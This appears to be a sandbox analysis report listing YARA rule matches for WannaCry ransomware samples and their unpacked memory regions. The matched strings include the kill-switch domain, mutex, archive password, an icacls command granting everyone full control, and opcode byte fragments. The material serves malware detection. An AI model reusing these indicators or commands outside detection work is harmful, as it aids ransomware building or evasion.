FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.stN592INV6.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.stN592INV6.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.stN592INV6.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.stN592INV6.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.2.stN592INV6.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
2.2.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.2.tasksche.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
2.2.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
2.2.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
0.2.stN592INV6.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.stN592INV6.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.stN592INV6.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.1fe70a4.4.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.stN592INV6.exe.1fe70a4.4.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0x263b7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.1fe70a4.4.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.1fe70a4.4.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.1feb104.2.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x22357:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.1feb104.2.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
1.2.stN592INV6.exe.1feb104.2.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.1feb104.2.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.stN592INV6.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.stN592INV6.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.stN592INV6.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.stN592INV6.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.0.stN592INV6.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.stN592INV6.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.stN592INV6.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.200e128.3.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.200e128.3.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.200e128.3.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.200e128.3.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.stN592INV6.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.stN592INV6.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
